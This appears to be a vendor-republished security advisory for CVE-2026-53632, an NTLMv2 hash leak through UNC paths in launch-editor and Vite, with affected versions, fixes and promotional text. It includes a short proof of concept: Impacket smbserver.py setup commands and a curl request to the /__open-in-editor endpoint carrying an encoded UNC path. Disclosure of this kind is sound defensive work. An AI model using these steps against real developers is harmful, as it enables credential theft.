CVE-2026-53632

CVE-2026-53632 is a medium-severity security vulnerability in launch-editor (npm), affecting versions <= 2.14.0. It is fixed in 2.14.1, 8.0.16, 7.3.5, 6.4.3, 0.1.24.

Summary

The launch-editor NPM package accesses arbitrary paths including Windows UNC paths. When a UNC path is opened, Windows automatically attempts NTLM authentication to the remote host, causing the user’s NTLMv2 password hash to be leaked to an attacker-controlled SMB server. This can result in credential compromise through offline hash cracking.

Details

launch-editor accepts file paths without validating or restricting Windows UNC paths such as:

\\attacker-host\share

On Windows systems, accessing a UNC path triggers an automatic NTLM authentication attempt to the remote SMB server. No user interaction or warning is required for this authentication attempt to occur.

If an attacker controls the SMB server referenced by the UNC path the victim’s NTLMv2 hash is transmitted to the attacker. The attacker can then capture the hash and perform offline password cracking. Successful cracking reveals the victim’s cleartext password.

The attacker could target a developer that uses a development server using launch-editor to develop code locally, send them a link and grab their NTLMv2 hash.

PoC

From the attacker side, we will setup an SMB server. I personally used Impacket's smbserver.py, but you could use something like Responder for this as well. For keeping it simple, we will use smbserver.py here.

First, let's create a directory to serve as an SMB share.

mkdir /tmp/data
echo "Hello world" > /tmp/data/test.txt

Then, start the SMB server.

$ sudo smbserver.py -smb2support -debug share /tmp/data

Now, run any project that uses the launch-editor package. I have setup a simple "Hello world" project that uses Vite to do this. Then run the project locally (vite).

Now last, we will open a browser window and navigate to the URL used by the launch-editor package to trigger the NTLM authentication. Or we can use curl to achieve the same.

curl 'http://localhost:5173/__open-in-editor?file=%5c%5c127.0.0.1%5cshare%5ctest.txt'

Note the IP address in the HTTP request, and make sure it connects to the IP address of the SMB server. Now we can look at the logs of smbserver.py and see the NTLMv2 hash coming in.

Impact

If the following conditions are met, an attacker can get the NTLMv2 password hash on the computer that is using the launch-editor:

  • using Windows
  • NTLM is not disabled (it is recommended to disable, while it's still enabled by default)
  • the user accesses the attackers website that sends request to a middleware using launch-editor
  • the server that has the middleware using launch-editor is running
  • the attacker knows the URL for that server and the middleware

This would be a problem if the user password is too simple that it can be identified through offline hash cracking, potentially leading to further compromise of developer accounts or internal systems.

Affected versions

launch-editor (<= 2.14.0) vite (>= 8.0.0, <= 8.0.15) vite (>= 7.0.0, <= 7.3.4) vite (<= 6.4.2) vite-plus (<= 0.1.23)

Security releases

launch-editor → 2.14.1 (npm) vite → 8.0.16 (npm) vite → 7.3.5 (npm) vite → 6.4.3 (npm) vite-plus → 0.1.24 (npm)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade the following packages to resolve this vulnerability:

launch-editor to 2.14.1 or later; vite to 8.0.16 or later; vite to 7.3.5 or later; vite to 6.4.3 or later; vite-plus to 0.1.24 or later

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-53632? CVE-2026-53632 is a medium-severity security vulnerability in launch-editor (npm), affecting versions <= 2.14.0. It is fixed in 2.14.1, 8.0.16, 7.3.5, 6.4.3, 0.1.24.
  2. Which packages are affected by CVE-2026-53632?
    • launch-editor (npm) (versions <= 2.14.0)
    • vite (npm) (versions >= 8.0.0, <= 8.0.15)
    • vite-plus (npm) (versions <= 0.1.23)
  3. Is there a fix for CVE-2026-53632? Yes. CVE-2026-53632 is fixed in 2.14.1, 8.0.16, 7.3.5, 6.4.3, 0.1.24. Upgrade to this version or later.
  4. Is CVE-2026-53632 exploitable, and should I be worried? Whether CVE-2026-53632 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  5. What actually determines whether CVE-2026-53632 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  6. How do I fix CVE-2026-53632?
    • Upgrade launch-editor to 2.14.1 or later
    • Upgrade vite to 8.0.16 or later
    • Upgrade vite to 7.3.5 or later
    • Upgrade vite to 6.4.3 or later
    • Upgrade vite-plus to 0.1.24 or later

Other vulnerabilities in launch-editor

CVE-2026-53632

Stop the waste.
Protect your environment with Kodem.